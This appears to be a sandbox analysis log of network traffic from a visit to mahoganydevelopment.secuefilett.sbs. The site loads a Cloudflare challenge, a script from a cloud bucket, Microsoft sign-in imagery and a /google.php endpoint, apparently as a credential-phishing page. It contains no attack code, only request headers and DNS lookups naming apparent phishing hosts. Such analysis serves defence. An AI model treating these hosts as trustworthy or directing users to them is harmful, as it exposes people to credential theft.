      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ke9o1/0x4AAAAAABB8wf99CD1wMh0u/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.secuefilett.sbs/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=9271c1802da2187f&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ke9o1/0x4AAAAAABB8wf99CD1wMh0u/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ke9o1/0x4AAAAAABB8wf99CD1wMh0u/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: mahoganydevelopment.secuefilett.sbsConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://mahoganydevelopment.secuefilett.sbs/ZQbNk/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=dq2513ldepr4om2rs7q1tngpc2
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1855224156:1743107274:-NPh796mR9Wm24gVmt_tL_rEwfMo1uK-sCHsRvbYTUo/9271c1802da2187f/57jg48eQSEfJLNSB_jKEThLQVHZWN1WawqgL0XmPvew-1743108582-1.1.1.1-HpVD1_RbA2r5zYemH610CztidO2D48zOmp5ZQhU.AbnoCtHY8DZLJqaF7DijxKBh HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/9271c1802da2187f/1743108583508/yZ3-l4iYq0BMia8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ke9o1/0x4AAAAAABB8wf99CD1wMh0u/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/9271c1802da2187f/1743108583508/yZ3-l4iYq0BMia8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/9271c1802da2187f/1743108583509/15a5bd1d1a05f1b5c84f56aeebc3e50760038a17fef8219c3d66031d187105f7/65NsV00LQOE-YSo HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ke9o1/0x4AAAAAABB8wf99CD1wMh0u/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1855224156:1743107274:-NPh796mR9Wm24gVmt_tL_rEwfMo1uK-sCHsRvbYTUo/9271c1802da2187f/57jg48eQSEfJLNSB_jKEThLQVHZWN1WawqgL0XmPvew-1743108582-1.1.1.1-HpVD1_RbA2r5zYemH610CztidO2D48zOmp5ZQhU.AbnoCtHY8DZLJqaF7DijxKBh HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1855224156:1743107274:-NPh796mR9Wm24gVmt_tL_rEwfMo1uK-sCHsRvbYTUo/9271c1802da2187f/57jg48eQSEfJLNSB_jKEThLQVHZWN1WawqgL0XmPvew-1743108582-1.1.1.1-HpVD1_RbA2r5zYemH610CztidO2D48zOmp5ZQhU.AbnoCtHY8DZLJqaF7DijxKBh HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://mahoganydevelopment.secuefilett.sbssec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://mahoganydevelopment.secuefilett.sbs/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://mahoganydevelopment.secuefilett.sbssec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://mahoganydevelopment.secuefilett.sbs/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.secuefilett.sbs/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://mahoganydevelopment.secuefilett.sbssec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://mahoganydevelopment.secuefilett.sbs/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 7074924506-1317754460.cos.ap-seoul.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.secuefilett.sbs/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1Host: res.cloudinary.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.secuefilett.sbs/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1Host: res.cloudinary.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 7074924506.sbsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://mahoganydevelopment.secuefilett.sbs/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 7074924506.sbsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: mahoganydevelopment.knack.com
      Source: global trafficDNS traffic detected: DNS query: cdn1.cloud-database.co
      Source: global trafficDNS traffic detected: DNS query: loader.knack.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: us-east-1-renderer-read.knack.com
      Source: global trafficDNS traffic detected: DNS query: us-east-1-renderer-write.knack.com
      Source: global trafficDNS traffic detected: DNS query: appcdn.cloud-database.co
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: mahoganydevelopment.secuefilett.sbs
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: mailmeteor.com
      Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: 7074924506-1317754460.cos.ap-seoul.myqcloud.com
      Source: global trafficDNS traffic detected: DNS query: 7074924506.sbs
      Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1855224156:1743107274:-NPh796mR9Wm24gVmt_tL_rEwfMo1uK-sCHsRvbYTUo/9271c1802da2187f/57jg48eQSEfJLNSB_jKEThLQVHZWN1WawqgL0XmPvew-1743108582-1.1.1.1-HpVD1_RbA2r5zYemH610CztidO2D48zOmp5ZQhU.AbnoCtHY8DZLJqaF7DijxKBh HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3700sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: 57jg48eQSEfJLNSB_jKEThLQVHZWN1WawqgL0XmPvew-1743108582-1.1.1.1-HpVD1_RbA2r5zYemH610CztidO2D48zOmp5ZQhU.AbnoCtHY8DZLJqaF7DijxKBhcf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ke9o1/0x4AAAAAABB8wf99CD1wMh0u/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 27 Mar 2025 20:49:43 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeServer: cloudflareCache-Control: max-age=14400Cf-Cache-Status: EXPIREDCF-RAY: 9271c1861adc590b-EWRalt-svc: h3=":443"; ma=86400
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 50042 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 50045 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 50050 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
      Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50042
      Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50045
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50044
      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50050
      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
      Source: unknownHTTPS traffic detected: 35.169.97.179:443 -> 192.168.2.17:49716 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.169.97.179:443 -> 192.168.2.17:49717 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 68.70.205.2:443 -> 192.168.2.17:49724 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 35.169.97.179:443 -> 192.168.2.17:49725 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.81.228:443 -> 192.168.2.17:49726 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 68.70.205.4:443 -> 192.168.2.17:49733 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 18.205.131.89:443 -> 192.168.2.17:49731 version: TLS 1.2
